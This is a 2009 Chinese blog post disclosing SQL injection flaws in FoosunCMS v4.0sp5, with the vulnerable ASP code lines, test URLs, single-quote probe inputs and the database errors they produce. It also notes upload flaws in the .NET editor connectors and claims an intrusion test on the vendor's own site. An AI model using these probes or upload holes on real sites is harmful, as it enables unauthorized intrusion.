风讯的产品,你还敢用吗?

2009, November 6, 2:16 PM. 漏洞集研
Submitted by admin

作者:jannock

今日来分析一下风讯的产品的安全性。
风讯管方最新下载,FoosunCMSv4.0sp5完整版(含模板)。安装后,查看了一下代码,发现多处SQL 注入。不由心地发出一句:这样的产品,你敢用吗?
对于ASP版。
1、漏洞文件

/User/i_Blog/Public_Save.asp
38行 p_FileName = Request.Form("FileName")
53行 set rstf = User_Conn.execute("select FileName,FileExtName From FS_ME_Infoilog where UserNumber='"
s_User.UserNumber"' and FileName='"&p_FileName"' and FileExtName='"&P_FileExtName"'")

变量没有过虑就进入数据库查询
测试方法
http://localhost/User/i_Blog/PublicLog.asp

在文件名那输入 test' 保存后出现

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'UserNumber='290149F916J' and FileName='test'' and FileExtName='html'' 中。

/User/i_Blog/Public_Save.asp, 第 53 行

2、漏洞文件

/user/Reg_Contact.asp

51 p_C_Name = Request.Form("C_Name")
85 AddCorpDataTFObj.open "select C_Name From FS_ME_CorpUser where C_Name = '"&
p_C_Name "'",User_Conn,1,3

也明显存在sql注入漏洞


40 p_RealName = Replace(Request.Form("RealName"),"''","")
115 AddUserDataTFObj.open "select UserName,Email From FS_ME_Users where UserName
= '"& p_UserName_1 "'",User_Conn,1,3


sql注入漏洞


3、user/Photo_Class.asp
26 rs.open "select title,id,UserNumber From FS_ME_PhotoClass where
title='"&trim(Request.Form("title"))"' and UserNumber='"&Fs_User.UserNumber"'",User_Conn,1,3

title 没有过虑就直接进入数据库
测试方法
http://localhost/user/Photo_Class.asp?Action=add


在相册分类名称那加入SQL注入语句 test'
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'title='test'' and UserNumber='290149F916J'' 中。

/user/Photo_Class.asp, 第 26 行

4、Order_Pay.asp


14 User_Conn.execute("Delete From FS_ME_Order where orderNumber='"&
equest.QueryString("OrderNumber")"' and UserNumber='"& Fs_User.UserNumber "'")

orderNumber 没有过虑
测试方法
http://localhost/User/Order_Pay.asp?action=lock_order&OrderNumber=4'


Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'OrderNumber='4'' and UserNumber='290149F916J'' 中。

/User/Order_Pay.asp, 第 14 行

5、OpenCorp.asp


39 p_C_Name = Request.Form("C_Name")
62 AddCorpDataTFObj.open "select C_Name From FS_ME_CorpUser where
C_Name = '"& p_C_Name "' and usernumber<>'"&session("fS_usernumber")"'",User_Conn,1,3

6、Message_box.asp

29 DelID = request.Form("MessageID")
35 User_Conn.execute("Delete From FS_ME_Message where MessageId in ("&DelID")
and M_ReadUserNumber ='"& Fs_User.UserNumber"'")

随便一看,就SQL注入就那么多。其它的漏洞呢?
一个SQL注入漏洞就能把网站黑掉。晕。。这样的系统还敢用吗?

对于最新的.net 版 风讯dotNETCMS v1.0
随便看了一下,也存在很严重的漏洞
editor\editor\filemanager\connectors\aspx
connector.aspx
upload.aspx
这两个文件都存在上传漏洞。
很容易上传木马

下面是对风讯管方网站的入侵测试
大小: 59.61 K
尺寸: 500 x 222
浏览: 43 次
点击打开新窗口浏览全图大小: 92.62 K
尺寸: 500 x 366
浏览: 41 次
点击打开新窗口浏览全图大小: 46.47 K
尺寸: 500 x 230
浏览: 39 次
点击打开新窗口浏览全图

不敢用风讯系统了吧?(注:以上只是本人友情测试)

« 上一篇 | 下一篇 »

只显示10条记录相关文章
foosun (风讯) 最新注入漏洞 (浏览: 13392, 评论: 0)
风讯CMS 0DAY exploits (浏览: 12117, 评论: 0)
再次公布风讯两个不为人知的0day (浏览: 22837, 评论: 0)
FoosunCMS Sql Injection Vulnerability (浏览: 10685, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):